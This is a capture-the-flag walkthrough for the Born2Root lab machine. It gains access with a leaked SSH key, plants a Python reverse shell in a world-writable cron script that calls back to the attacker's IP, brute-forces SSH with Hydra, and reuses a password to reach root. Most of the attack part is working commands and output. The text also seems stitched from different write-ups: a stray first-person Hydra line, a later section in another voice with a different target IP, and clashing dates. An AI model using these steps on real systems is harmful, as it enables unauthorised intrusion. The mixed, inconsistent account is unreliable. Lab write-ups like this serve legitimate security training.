Exploitation Guide for Born2Root
Summary
Born2Root is an intermediate machine that requires good enumeration and a basic understanding of Linux cronjobs.
Enumeration
Nmap
We initiate our enumeration of the target by launching two nmap scans. The first one will identify open ports, and the second one will attempt to discover more information about each service.
kali@kali:~$ sudo nmap 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
kali@kali:~$ sudo nmap -p 22,80,111 -A 192.168.54.49
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-22 11:53 SAST
Nmap scan report for 192.168.54.49
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
| 2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
| 256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_ 256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp open http Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries
|_/wordpress-blog /files
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Secretsec Company
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39832/tcp6 status
| 100024 1 47504/udp status
| 100024 1 50443/udp6 status
|_ 100024 1 52205/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have a web server running on port 80. Browsing to the website, we find a company web page with general and contact information. We should take note of the username martin, which appears twice on this page: in the About Us section and in the Contact Us section.
GoBuster
We will use GoBuster to brute-force directory names on the web server with the common.txt wordlist, in an attempt to discover any other folders present.
kali@kali:~$ locate common.txt
...
/usr/lib/python3/dist-packages/mercurial/helptext/common.txt
/usr/share/dirb/wordlists/common.txt
...
kali@kali:~$ gobuster dir -t 20 -w /usr/share/dirb/wordlists/common.txt --url http://192.168.54.49
...
/.htpasswd (Status: 403)
/.hta (Status: 403)
/.htaccess (Status: 403)
/files (Status: 301)
/icons (Status: 301)
/index.html (Status: 200)
/manual (Status: 301)
/robots.txt (Status: 200)
/server-status (Status: 403)
...
Among the results is a directory named /icons. Browsing to it, we find a text file VDSoyuAXiO.txt that contains an SSH private key. We download the key and save it to a file.
kali@kali:~$ curl -s http://192.168.54.49/icons/VDSoyuAXiO.txt -o born
kali@kali:~$ cat born
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAoNgGGOyEpn/txphuS2pDA1i2nvRxn6s8DO58QcSsY+/Nm6wC
...
2o1pyGm7j7wfhIZNBP/wwJSC2/NLV6rQeH7Zj8nFv69RcRX56LrQZjFAWWsa/C43
rlJ7dOFH7OFQbGp51ub88M1VOiXR6/fU8OMOkXfi1KkETj/xp6t+
-----END RSA PRIVATE KEY-----
Exploitation
Local SSH Access
Let's give the key the restrictive permissions OpenSSH insists on (it refuses to use a private key that is readable by other users) and then use it to SSH as martin. The key has no passphrase; the "secret password" prompt that follows is printed by the target after we are already logged in, not by SSH, and we can simply press Enter to get past it.
kali@kali:~$ chmod 0600 born
kali@kali:~$ ssh -i born martin@192.168.54.49
...
READY TO ACCESS THE SECRET LAB ?
secret password :
WELCOME !
martin@debian:~$ id
uid=1001(martin) gid=1001(martin) groups=1001(martin)
Escalation
Local Enumeration
Checking the cronjobs scheduled on the system, we find an entry in the system-wide crontab that runs a Python script out of /tmp every five minutes as the user jimmy:
martin@debian:~$ cat /etc/crontab
...
*/5 * * * * jimmy python /tmp/sekurity.py
Because /tmp is world-writable, any local user can create /tmp/sekurity.py if it does not exist yet (or modify it if it is writable), and cron will then execute whatever it contains as jimmy.
Reverse Shell
We can write a Python reverse shell into /tmp/sekurity.py and wait up to five minutes for the cronjob to run it. No chmod +x is needed, since cron invokes the file through the python interpreter rather than executing it directly. The system python on this Debian 8 target is Python 2, and the payload below works on both Python 2 and 3; the address is our Kali machine:
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.63.200", 80))       # connect back to our listener on port 80
os.dup2(s.fileno(), 0)                  # stdin
os.dup2(s.fileno(), 1)                  # stdout
os.dup2(s.fileno(), 2)                  # stderr, all wired to the socket
p = subprocess.call(["/bin/sh", "-i"])  # interactive shell over the connection
We need to set up a netcat listener on our Kali machine to catch the reverse shell that is going to get executed on the target system.
After a few minutes, we catch our shell:
kali@kali:~$ sudo nc -lvp 80
listening on [any] 80 ...
192.168.54.49: inverse host lookup failed: Unknown host
connect to [192.168.63.200] from (UNKNOWN) [192.168.54.49] 52400
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ python -c 'import pty; pty.spawn("/bin/bash")'
jimmy@debian:~$
SSH Login Brute-Force
Let’s check /etc/passwd to get a list of available users on the system:
jimmy@debian:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
--snip--
sshd:x:107:65534::/var/run/sshd:/usr/sbin/nologin
hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash
martin:x:1001:1001:,,,:/home/martin:/bin/bash
jimmy:x:1002:1002:,,,:/home/jimmy:/bin/bash
The user hadi stands out as another user also mentioned on the company website.
kali@kali:~$ grep hadi /usr/share/wordlists/rockyou.txt > /home/kali/hadi.txt
I then used the text file with Hydra to brute-force SSH, which actually worked.
Now we can try brute-forcing the password for the user hadi with Hydra, using a single login name and the filtered wordlist as the password list. We keep the number of parallel tasks low (-t 4), as Hydra itself recommends for SSH: OpenSSH's MaxStartups setting limits concurrent unauthenticated connections, and running more tasks than that produces dropped connections and missed passwords:
kali@kali:~$ hydra -t 4 -l hadi -P /home/kali/hadi.txt 192.168.54.49 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-06 09:39:44
[DATA] max 4 tasks per 1 server, overall 4 tasks, 1161 login tries (l:1/p:1161), ~291 tries per task
[DATA] attacking ssh://192.168.54.49:22/
[STATUS] 24.00 tries/min, 24 tries in 00:01h, 1137 to do in 00:48h, 4 active
[STATUS] 26.33 tries/min, 79 tries in 00:03h, 1082 to do in 00:42h, 4 active
[STATUS] 23.43 tries/min, 164 tries in 00:07h, 997 to do in 00:43h, 4 active
[STATUS] 23.67 tries/min, 284 tries in 00:12h, 877 to do in 00:38h, 4 active
[22][ssh] host: 192.168.54.49 login: hadi password: hadi123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-06 09:52:26
We find that the password is hadi123, and now we simply switch from our current user to hadi with the recovered password:
jimmy@debian:~$ su hadi
...
hadi@debian:/home/jimmy$ id
uid=1000(hadi) gid=1000(hadi) groups=1000(hadi),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
Escalation to Root
The password for root was re-used and is the same as hadi's: hadi123. Trying a recovered password against the other accounts, root included, is always worth doing before looking for a kernel or service exploit.
hadi@debian:~$ su -
Password:
root@debian:~# whoami
root
The crontab, explained
The job that handed us the jimmy shell is the last entry of /etc/crontab. Unlike per-user crontabs, the system-wide file carries a user field, which is why a single line run by cron as root could schedule a script to run as jimmy:
root@debian:/var/spool/cron# cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/5 * * * * jimmy python /tmp/sekurity.py
root@debian:/var/spool/cron#
THE RABBIT HOLE
The networker binary is a lie. There isn't anything in it that is helpful. It doesn't take any input, it doesn't open any ports, and the paths are all hard-coded. I'm sure there's a way to edit the binary to add our own custom shellcode to it, but I don't have my OSCE yet and this is supposed to be an intermediate-difficulty VM, so I'm not about to go try and deal with that.
Instead, I’m going to go back to my OSCP training
kali@kali:~$ sudo nc -nlvp 80
Password:
listening on [any] 80 ...
connect to [192.168.63.200] from (UNKNOWN) [192.168.63.49] 53601
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1002(jimmy) gid=1002(jimmy) groups=1002(jimmy)
$ ls -la
total 28
drwx------ 2 jimmy jimmy 4096 Jun 9 2017 .
drwxr-xr-x 5 root root 4096 Jun 9 2017 ..
-rw-r--r-- 1 root root 0 Mar 6 2020 .bash_history
-rw-r--r-- 1 jimmy jimmy 220 Jun 8 2017 .bash_logout
-rw-r--r-- 1 jimmy jimmy 3515 Jun 8 2017 .bashrc
-rw-r--r-- 1 jimmy jimmy 675 Jun 8 2017 .profile
-rwsrwxrwx 1 root root 7496 Jun 9 2017 networker
$ file networker
networker: setuid ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=bacc02fa5747f07430f55e0d5e70d4078800c9f5, not stripped
$ strings networker
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 ***
/sbin/ifconfig
/bin/ping -c 1 localhost
Done
echo 'echo linux tool version 5'
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
--snip--
.dynamic
.got.plt
.data
.bss
.comment
$